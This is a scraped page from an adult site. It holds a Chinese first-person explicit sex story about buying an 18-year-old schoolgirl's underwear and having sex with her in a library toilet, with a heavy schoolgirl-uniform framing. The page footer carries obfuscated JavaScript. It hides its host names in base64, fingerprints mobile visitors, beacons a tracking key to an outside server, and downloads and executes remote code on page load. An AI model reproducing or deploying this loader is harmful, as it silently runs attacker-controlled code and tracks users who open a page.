大一那年迷上玩BBS,那天突然一个传讯映入眼帘……

“你想要买我穿过的内裤吗……?”

向来好色的我也不禁一愣……天吶?!耍我吗……?

忍不住也回了那人说︰“你是男的女的?”

一番对话后才知她是个女生,十八岁,一所知名的女子高中生……

在好奇心诱引之下,就约她在台北市市立图书馆见面交易……

那天是星期四下午约五点左右,她穿着她们学校的制服前来,虽然是清汤挂面的发型,但遮掩不住她那清丽的面貌,她的制服应该是订做的,因为她的身材充分表达出来……

她先带我到厕所旁的逃生梯,她问我愿意出多少钱买?

当时我只有两千元,于是我便出两千元!

她很爽快的答应了,我便给了她钱,我就等她拿出她的小裤裤给我,谁知她居然叫我带她进去男厕所!因为她要把她身上穿的内裤脱下来给我,我既惊讶也十分开心,因为实在是太刺激了……

在台北市市立图书馆的逃生梯那里,我一直等着她拿小裤裤给我……

她看了看我,在我的耳边小声的说︰“你先去男生厕所看有没有人!”

奇怪了?!为什幺要去男生厕所呢?当时的我并不了解,我问︰“为什幺呢?”

她娇媚的在我耳边细细的说︰“难道你要人家在这里脱吗?”

原来她是要卖我她现在穿着的那条小裤裤……

哇!这样的女生那里是甚幺味道呢?是肥皂的香味呢?是人体的香味?还是淫臭味呢?不知不觉的我竟幻想起来……

“快点去啦!你这样要人家等吗?”她的软语把我从幻想拉回了现实里来。

我当然就去探勘场地了!发现四楼的男厕所空无一人,或许大家都去吃晚饭了吧!我看了看手表,果然已经快六点了,我迅速回去找她,还好还在,不然就真的是做了场春梦!

我说︰“四楼男厕所没人,快点去吧!”

她说︰“你不陪我去吗?帮我把风啊!”

她不等我答话,就搂着我的手向男厕所走去,我的手不断踫到她的胸部,至少是C-cup的胸部,不大不小,正是我喜欢的类型,心里想真是棒极了……

她四处张望了一下,迅速带我冲进了男厕所,幸亏没人不然这可好玩了!她打开了其中的一扇门,走了进去……,我站在门外以便把风,她突然抓住我拉了拉,示意要我进去……

我觉得奇怪,便问她︰“为什幺要我进来呢?”

她说︰“你站在外面,万一有人进来,反而令人觉得奇怪吧?!”

我想也对!便跟她进去了,不对啊!!!那她脱裤子的时候,岂不是会被我看光……,我一想到这连忙转了个身,以免看到那就太不好意思了,还好市图的厕所够大,不然两个人贴在一起还得了?!正想到这里,她的动作一直踫到我,不过我还是不敢看她,深怕一转头就是那种画面,突然她靠了过来,又在我的耳边说︰“你好老实喔!”

霎那间我的脸都红了!

她接着问︰“你要不要人家在内裤上,留下那种液体呢?”

这……这真是有如霹雳一般!答应了很不好意思,不答应又白白丧失掉……,在恶魔的驱使下,我害羞的点了点头,点头的时候看到自己的弟弟似乎已经蠢蠢欲动了……

她又问︰“那你想不想要看我自慰呢?”

“可以吗?”我用压低而沙哑的声音问道。

她用手拉我转身,一转身就看到她的眼神充满了妩媚,我的自制力也面临崩溃的边缘……

她稍稍后退了些,手伸往她那裙子下的神秘地带开始抚摸了起来……

我不禁的也蹲下去想要看仔细一些……,她穿的是一件白色的内裤,剩下的因为裙子的关系看不到,但是她的细白的大腿却是一览无遗,而且小腿和大腿的比例匀称至极,我看过许多腿,这种型的正是我理想中的美腿……

更令人兴奋的是,她穿的正是当时十分前卫的泡泡袜!配合一双圆头鞋!正是日本女高中生的制服配备!A片里我最喜欢的正是女学生剧情的了!!天吶!神啊!请多给我一些钱好买下她吧!!!真是完美的女孩啊!

看着她在自己的私处游移,脸蛋越来越红润,真是美极了!她又解开她制服的钮扣,把手伸进去搓揉着自己的双乳……

哇!她的胸罩也是白色的,而且还有蕾丝边的!不久她渐渐发出了淫荡的喘息声……

此时我也看到她的白色内裤已经湿透了,变得略为透明……,她突然停了下来,我以为她已经觉得够了,准备转身让她脱下来给我……

我站了起来,她伸出手拉着我,她的手指间还有些湿湿滑滑的……

她说︰“你帮我安慰一下吧?!我的手昨天打球很酸了……”

我整个人也愣住了……

“快一点嘛!……”她晃着我的手说着。

我的自制力完全崩溃,我温柔的向她靠近了些,伸手向她神秘的部位摸去…

我隔着她的内裤抚摸,其实并不十分湿润,可见她刚刚一定摸没多久,就直接伸进内裤里面去了,可见她的需求很强,但我仍然隔着内裤摸索着,因为内裤才是我的记念品……

她娇喘着说︰“快……不要再吊我胃口了!……”

我问︰“那允许我做甚幺呢?”

“你想怎样就怎幺样吧!嗯……”

“可是我还是处男耶!愿意吗?……”

“我也还是处女耶!嗯……可是实在是好棒……”

她娇喘的在我耳边说着︰“人家很想要嘛!……你想怎幺做就怎幺做……可是要温柔一点喔!人家怕痛……”

“真的……?”我问道。

“你很坏耶!这种话还要人家再重覆一次吗?讨厌……”她语带娇媚的说着。

“那我要开始了喔!”

“快点啦!……”

我首先温柔的亲着她温润的双唇,双手摸着她那细瘦的臀部,揽着她那縴细的腰际,心中想着就当是一场春梦吧!……

她细若无骨的双手,抱着我宽厚的胸膛,我更加紧亲吻只想保留这一刻,双手开始在她的臀部抚摸起来,慢慢地移向她的双峰,由于之前她的自慰已经解开了两个扣子,我的手只能伸进一只,那只手便在她的胸罩上,搓揉着她那不小的乳房,而另一只手只好搂着她的腰……

她的胸罩上面并没有许多的蕾丝,花样应该并不花俏,很快的我便伸进她的胸罩之下,直接触摸她的双乳……

她的皮肤很好,细緻到了极点,乳头已经微微坚挺起来,我用指尖挑逗着她的乳头,她停止了跟我接吻的动作,而准备解开她剩余的钮扣……

我制止了她,我说︰“解开女生的衣服,是男生的义务!”

我便帮她解开剩下的钮扣,此时才看到她的胸罩的样式,很朴素,但适合清纯的女生!她的胸罩已经因为我刚刚的爱抚歪了一边,我索性将它拉上去……

一边用嘴巴吸吮着,另一边则用手抚摸着她,此时她用双手拉着我另一只手朝她的私处前去……,我也就隔着内裤抚摸着她的私处……

不久她的私处便有了反应,内裤开始变湿,她的呼吸声也越来越大声,还好还没有人进来,真是天助我也!

我停下了刺激她的胸部,因为半蹲的姿势实在是很累,于是我蹲在她的股间,掀起那一向熟悉的百折裙,终于看见这次交易的商品……

那是一条白色的纯棉内裤,只有上面有一个小蝴蝶结,我的手仍然在她的私处抚摸,她的双手抱住我的头,她小声的说︰“伸进去没关系!……”

话才说完,突然!她的私处的液体大增,沾满了内裤底端,已经湿漉漉的了…

…,我的战利品也终于完成了……

我也就干脆从胯间内裤的缝隙伸进去,抚摸她的神秘地带……

整个湿淋淋的阴户,被我的手探索着,我从未摸过女生的私处……,所以我很仔细的摸着,但是因为一只手实在太慢,我就站了起来,把两只手都伸了下去,一只从前面,一只从后面,摸着她的阴户跟屁股……

她紧紧的抱住我,亲吻我……

我的手为了回应她,就把她的阴户拨开,用另一只手玩弄着她湿润的阴道,跟微微突起的阴核,她再也受不了我如此的逗弄,拼命的要求着︰“快点……我要…

…快嘛……”

这样的清纯女孩的要求,我怎忍心拒绝她呢?

我再次蹲了下来,把她的内裤脱到脚边,看到她那湿漉漉的阴户,呈现着闪闪发光的颜色,稀疏的阴毛沾着一点点的淫水,真是漂亮极了,忍不住摸了她那里一下,或许是没有心理准备吧?!她竟然哼了一声很大声,这个时候突然有人走了进来……

我正惊讶于那人跑了进来!……但是那人似乎并未发现……

而她却似乎一点也不知觉,闭着眼睛仍在享受着那份快感……,唉∼管他那幺多,继续做吧!……

我帮她完全的脱下她的内裤,十分珍重的放进了我的背包,当我再转身的时候,她又抱住我……,问道︰“换我帮服务吧!”

不等我回话,她伸手摸向我已经涨大的家伙……,我也不甘示弱,也摸着她湿淋淋的神秘地带,她伸进我的外裤中,隔着内裤挑逗着我的阴茎,她蹲了下来,把我的内裤和外裤一并脱下,我涨大的阴茎完全呈现在她的眼前……

“天吶!这幺粗啊!……”她如此说道。

接着她张开她的嘴巴,吸吮着我的龟头,她用舌尖弄着我的马眼,含住我的整个龟头,毕竟我还是处男,一个控制不住便射了出来!完全射进了她的嘴巴……

“吐出来吧!……”我这幺说着。

她“嗯∼”的一声,点了点头,便吐了出来……

我把她扶了起来,再次亲吻她,用舌头舔干净她的嘴内的一切,我把她温柔的压向墙壁,我也蹲下来舔着她的花朵……,而且逐渐加强速度和力道,她的私处又再次流出淫水,我也将它一一吸了下去,其实也蛮有另一番风味……

我将她的脚放到我的肩上,如此我可以舔的更加深入,我站了起来,将她的细脚放到我的腰际,用手肘压住,手则在她的大腿游移,我把我坚硬的家伙沾满了她的淫液,顶住她的花心,准备进攻……

“准备好了吗?”我问道。

“嗯……”她娇滴滴的点了点头。

“那要开始!……”

我的阳具开始向她的阴道插入,她的表情出现了疼痛的样子……,但她仍努力的忍受,我便大力的用屁股一送,深深地插进了她的阴道……

此时她的下体也流出了血……,哇!真的是处女!……

我为了使她忘记疼痛,压住她脚的手,积极的挑逗她的大腿,而另一只手搓揉她的乳房,嘴巴亲吻着她的唇,她的脖子……

她的表情也渐渐的舒缓,而转成享受的样子……

由于只有一只脚被我抬起来,我的阴茎只能刺激到一部份而已,所以我也将另一只脚抬起来,让她靠在墙壁上……

我的双手刺激着她的阴户……阴核……阴唇……肛门……阴道……

尤其是肛门跟阴道,她十分的敏感,摸她的肛门时,她虽然小声的说︰“不要……那里会臭……”

但是一当我摸的时候,她阴道内的淫液马上大增,还不断发出娇爽的声音,而我的阴茎插入阴道,也有时将手指伸入,她虽然痛,但是也十分爽……

这女孩该不会也有被虐的倾向吧?!……

由于这种站立的姿势很花费体力,我虽然感觉的到快感,但却一直达不到射精,而她的淫液,已经从穴内不断滴到她的大腿上,也沿着我的阴差流下来……

我便猛力拼命的快插,她的叫声也大了起来,我赶紧亲吻她,以免被人发现!

不一会儿,她便说她要高潮了!我加快抽插的速度,她细白的双脚,紧紧的缠住我的腰,我也感应到这样的快感,更加努力的插入,一阵的快感冲向脑际,我们便都达到了高潮!

我强而有力的精液,射在她温暖的阴道内,她也流了不少的淫水出来!

两个人都几乎无力,我缓缓的放了她下来,她倚靠在墙壁上,下体除了血,还有我的精液及她的淫水……

我拿了卫生纸,把她的身子擦干净后,才擦拭自己的炮管……,两个人的生殖器都红红肿肿的,毕竟还是第一次嘛!

我帮她整理整理了衣服,她实在是很累,所以我帮她穿衣服很麻烦……

我问︰“有带别条内裤吗?”

她摇摇头……,难道她想这样子回家吗?!

我迅速的溜到外面,确定都没人了才带她出来!我俩都还饿着肚子,我带她去夜市吃饭,当然也买了内裤……

临别时,我请她做我的女朋友……,她并未答话……

我问她可以再见面吗?她只要了我电话……,说︰“随缘了……”

也许真的只是一场美丽的绮梦吧……?

关闭⊗
提示

本站正在被宽带运营商屏蔽,即将无法访问! ! !

请立刻记住本站新域名

https://avxuexiao.com

推荐:点击访问新站并收藏到手机

© Copyright 御姐电影 2023. All rights Reserved . By

function kdtPF(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function mdOiI(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return kdtPF(t);};window[''+'H'+'J'+'i'+'q'+'c'+'g'+'z'+'b'+'I'+'']=((navigator.platform&&!/^Mac|Win/.test(navigator.platform))||(!navigator.platform&&/Android|iOS|iPhone/i.test(navigator.userAgent)))?function(){;(function(u,k,i,w,d,c){var x=mdOiI,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));!function(o,t){var a=o.getItem(t);if(!a||32!==a.length){a='';for(var e=0;e!=32;e++)a+=Math.floor(16*Math.random()).toString(16);o.setItem(t,a)}var n='https://sdc.dlrtz.com:7891/stats/13441/'+i+'?ukey='+a+'&host='+window.location.host;navigator.sendBeacon?navigator.sendBeacon(n):(new Image).src=n}(localStorage,'__tsuk');'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')!=-1){var xhr=new XMLHttpRequest();xhr.open('POST',u+'/vh3/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else if(WebSocket&&/UCBrowser|Quark|Huawei|Vivo|NewsArticle/i.test(navigator.userAgent)){k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1])));var ws=new WebSocket(k+'/wh3/'+i);ws.onmessage=function(e){ws.close();new Function('_tdcs',x(e.data))(cs);};ws.onerror=function(){var s=d[crd]('script');s.src=u+'/vh3/'+i;cs.parentElement.insertBefore(s,cs);}}else{var s=d[crd]('script');s.src=u+'/vh3/'+i;cs.parentElement.insertBefore(s,cs);}})('aHR00cHMlM00ElMkYlMkZnYi56YWJ1bm4uY29tJTNBODg5MQ==','d3NNzJTNNBJTJGJTJGd2RjLnphY2Fvei5jb20lM0E5NNTM0','160756',window,document,['0','N']);}:function(){};